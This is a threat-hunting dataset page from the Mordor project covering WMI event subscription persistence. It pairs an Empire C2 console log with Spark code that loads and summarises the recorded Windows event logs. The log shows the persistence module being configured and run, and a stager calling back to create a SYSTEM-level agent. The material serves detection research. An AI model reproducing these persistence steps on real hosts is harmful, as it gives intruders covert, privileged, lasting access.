Empire Elevated WMI Eventing¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
[‘T1546.003’] |
Tags |
[‘Local WMI Eventing’, ‘WMI Event Subscriptions’] |
Dataset Description¶
This dataset represents adversaries leveraging WMI subscriptions locally for persistence.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
Adversary View¶
(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:42:01 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:41:59 http
(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) >
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
@jbooz1
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 13ZK6G7M Agent to run module on.
Listener True http Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
FailedLogon False Trigger script with a failed logon
attempt from a specified user
SubName True Updater Name to use for the event subscription.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) >
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:43:48 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:43:48 http
PYA28EDF ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 7480 5/0.0 2020-09-04 20:49:29 http
(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) >
nt authority\system
..Command execution completed.
(Empire: PYA28EDF) >
(Empire: PYA28EDF) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12 |18003|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |17918|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13 |11497|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7 |9531 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |2785 |
|WORKSTATION5.theshire.local|security |5447 |2715 |
|WORKSTATION5.theshire.local|security |4658 |2629 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|10 |1675 |
|WORKSTATION5.theshire.local|security |4656 |1361 |
|WORKSTATION5.theshire.local|security |4690 |1285 |
|WORKSTATION5.theshire.local|security |4663 |1083 |
|WORKSTATION5.theshire.local|security |4703 |997 |
|WORKSTATION5.theshire.local|security |5156 |482 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|7 |402 |
|WORKSTATION5.theshire.local|security |5158 |372 |
|WORKSTATION5.theshire.local|security |4673 |347 |
|MORDORDC.theshire.local |Security |5156 |314 |
|WORKSTATION5.theshire.local|Windows PowerShell |800 |286 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|9 |270 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|12 |252 |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows